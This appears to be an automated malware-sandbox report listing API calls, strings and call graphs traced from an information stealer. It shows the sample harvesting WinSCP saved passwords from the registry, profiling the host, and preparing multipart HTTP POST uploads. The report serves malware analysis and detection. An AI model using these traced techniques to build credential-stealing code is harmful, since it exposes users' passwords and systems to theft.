                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internet$lstrlen$Heap$CloseHandle$lstrcpy$Process$Free$FileOpenReadlstrcatmemcpy$AllocConnectCrackHttpOptionRequestSleepSystemTime
                                                                                                                                                                                                                                                                                                  • String ID: "$------$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$ERROR$HTTP/1.1$POST$build_id$https$mode$token

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,004185CA), ref: 00418615
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(ntdll.dll), ref: 004187EB
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004187FB
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(user32.dll), ref: 0041880B
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(crypt32.dll), ref: 0041881B
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(gdi32.dll), ref: 0041882B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$HandleModule
                                                                                                                                                                                                                                                                                                  • String ID: CloseHandle$CreateDCA$CreateEventA$CryptStringToBinaryA$ExitProcess$GetComputerNameA$GetCurrentProcess$GetDeviceCaps$GetProcAddress$GetProcessHeap$GetSystemInfo$GetSystemTime$GetUserDefaultLangID$GetUserNameA$GlobalMemoryStatusEx$LoadLibraryA$NtQueryInformationProcess$OpenEventA$ReleaseDC$Sleep$SystemTimeToFileTime$VirtualAlloc$VirtualAllocExNuma$VirtualFree$advapi32.dll$crypt32.dll$gdi32.dll$kernel32.dll$lstrcatA$lstrcpyA$lstrlenA$ntdll.dll$sscanf$user32.dll

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040D9DD
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040D9FA
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040DA10
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040DA26
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040DA55
                                                                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,00000004), ref: 0040DA7F
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040DA9C
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040DAD0
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040DAEC
                                                                                                                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32 ref: 0040DB1A
                                                                                                                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32 ref: 0040DB9D
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040DB43
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,00000004,?,?,?), ref: 0040DC49
                                                                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,?,Password,00000002,00000000,?,00000400,?,?,00421509,?,?,?), ref: 0040DD2C
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042150A,?,?,Password: ), ref: 0040DD54
                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?), ref: 0040DDDF
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040DDFE
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,passwords.txt), ref: 0040DE5F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411EA0: wsprintfA.USER32 ref: 00411EB5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memset$CloseValuelstrcpy$EnumOpenlstrcatlstrlen$??3@_invalid_parameter_noinfo_noreturnwsprintf
                                                                                                                                                                                                                                                                                                  • String ID: Login: $:22$Host: $HostName$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$k@$passwords.txt$#
                                                                                                                                                                                                                                                                                                  • API String ID: 3659326365-2564332296
                                                                                                                                                                                                                                                                                                  • Opcode ID: db978dd1d17637b8657636170a5939793f2c46e79f922b8388fc985c6b70aa0e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9d2ed302519055baedf3f01fb35ec56aa45f2f10d73b1c3b99b849dfdee8a1d1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db978dd1d17637b8657636170a5939793f2c46e79f922b8388fc985c6b70aa0e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32D19371B002186BDB14ABA1DC9ABFF77B9AF44704F10041EF506B7281DBBC5985CBA9

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  control_flow_graph 2574 413510-413e47 call 4101c0 call 410340 call 410290 call 410230 call 401360 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410920 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 411120 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410700 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410540 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 GetCurrentProcessId call 411cc0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4107c0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 411200 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 411200 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4108e0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4108b0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4110a0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4109f0 call 4102e0 call 
410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410920 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410990 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410b30 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410be0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410ba0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410cb0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410d30 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410fe0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410d80 call 4102e0 call 410290 call 410230 * 2 call 410d80 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410530 lstrlenA call 410530 call 4101c0 call 410200 * 4 call 413e50 call 410230 * 6
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410920: GetProcessHeap.KERNEL32(?,?,Version: ,0042150A,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 0041092D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410920: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 0041093B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410920: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 00410942
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410920: wsprintfA.USER32 ref: 00410971
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411120: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 004111AE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411120: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF), ref: 004111CF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411120: RegCloseKey.ADVAPI32(?), ref: 004111D8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411120: CharToOemA.USER32(?,?), ref: 004111EB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410700: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410716
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410700: memset.MSVCRT ref: 0041073F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410700: lstrcatA.KERNEL32(?,00000000,?,00000000,00000000,0000000E,?,?,?), ref: 0041076A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410700: lstrcatA.KERNEL32(?,0041FE21,?,00000000,00000000,0000000E,?,?,?), ref: 00410780
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041055C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: GetVolumeInformationA.KERNEL32 ref: 004105AE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0041060D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 0041061B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: wsprintfA.USER32 ref: 00410652
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: lstrcatA.KERNEL32(00000000,00421178), ref: 00410661
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: lstrlenA.KERNEL32(00000000,?), ref: 00410687
                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,Path: ,?,?,00421508,?,?,?,?,?,?,HWID: ,?,?,00421509), ref: 0041371F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411CC0: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00411CDD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411CC0: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411CF4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411CC0: CloseHandle.KERNEL32(00000000), ref: 00411CFB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004107C0: GetProcessHeap.KERNEL32 ref: 004107D4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004107C0: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 004107E2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004107C0: GetProcessHeap.KERNEL32 ref: 004107F4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004107C0: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410802
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004107C0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 0041081A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004107C0: RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,?), ref: 00410837
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004107C0: RegCloseKey.ADVAPI32(?), ref: 00410840
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004107C0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,00000000), ref: 0041086D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004107C0: RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,00000000,000000FF), ref: 0041088A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004107C0: RegCloseKey.ADVAPI32(?), ref: 00410893
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108E0: GetProcessHeap.KERNEL32(00000000,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D), ref: 004108E2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108E0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F), ref: 004108F0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108E0: GetComputerNameA.KERNEL32(00000000), ref: 00410903
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108B0: GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108B0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108B0: GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004110A0: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004110B3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004110A0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004110BE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004110A0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004110C9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004110A0: ReleaseDC.USER32(00000000,00000000), ref: 004110D4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004110A0: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004110E0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004110A0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004110EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004110A0: wsprintfA.USER32 ref: 004110FA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004109F0: GetKeyboardLayoutList.USER32(00000000,00000000,0042150A), ref: 00410A11
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004109F0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410A23
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004109F0: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410A2D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004109F0: GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200), ref: 00410A4D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004109F0: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000,00000200,?,?,?), ref: 00410AB4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004109F0: LocalFree.KERNEL32(00000000), ref: 00410B18
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410990: GetProcessHeap.KERNEL32(?,?,00421509,?,?,?,?,?,?,AV: ,?,?,00421509,?,?,?), ref: 0041099D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410990: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004109AB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410990: GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004109B2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410990: wsprintfA.USER32 ref: 004109DC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410B30: GetProcessHeap.KERNEL32 ref: 00410B42
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410B50
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410B30: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 00410B68
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410B30: RegQueryValueExA.KERNEL32(?,ProcessorNameString,00000000,00000000,00000000,000000FF), ref: 00410B85
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410B30: RegCloseKey.ADVAPI32(?), ref: 00410B8E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BE0: GetLogicalProcessorInformationEx.KERNEL32(0000FFFF,00000000,?), ref: 00410C19
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BE0: GetLastError.KERNEL32 ref: 00410C1F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BE0: wsprintfA.USER32 ref: 00410C7B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BA0: GetSystemInfo.KERNEL32(?), ref: 00410BAA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BA0: wsprintfA.USER32 ref: 00410BBE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410CB0: GetProcessHeap.KERNEL32(?,Windows: ,?,?,00421508,?,?,Work Dir: In memory,?,?,00421509,?,?,?,?,00000000), ref: 00410CC1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410CB0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 00410CCF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410CB0: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 00410CE7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410CB0: wsprintfA.USER32 ref: 00410D0F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410FE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411009
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410FE0: Process32First.KERNEL32(00000000,00000128), ref: 00411017
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410FE0: Process32Next.KERNEL32(00000000,00000128), ref: 00411027
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410FE0: Process32Next.KERNEL32(00000000,00000128), ref: 0041107A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410FE0: CloseHandle.KERNEL32(00000000), ref: 00411085
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D80: RegOpenKeyExA.KERNEL32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,00000000), ref: 00410DCE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D80: RegEnumKeyExA.KERNEL32 ref: 00410E10
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D80: wsprintfA.USER32 ref: 00410E89
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D80: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00410EA0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D80: RegQueryValueExA.KERNEL32(?,DisplayName,00000000,?,?,?), ref: 00410ECD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D80: lstrlenA.KERNEL32(?), ref: 00410EDC
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00421509,?,?,?,?,?,?,Install Date: ,?,?,00421509,?,?,00000000), ref: 00413D8B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413E50: Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413E50: CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413E50: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$Process$Alloc$wsprintf$Open$Close$QueryValuelstrcatlstrcpy$lstrlen$CreateInfoInformationLocalNameProcess32$CapsCurrentDeviceHandleKeyboardLayoutListLocaleNextTime$CharComputerDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleObjectProcessorProfileReleaseSingleSleepSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                                                                                                                                                                                                                                  • String ID: yA$ yA$AV: $Computer Name: $Cores: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                                                                                                                  • API String ID: 429884184-1563601650

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001,?,?,?,?,00000009,?,00420BBE,?,?,?,C:\ProgramData\,0042150A), ref: 00407E8D
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EAE
                                                                                                                                                                                                                                                                                                  • PathFileExistsA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004089FB), ref: 00407EC9
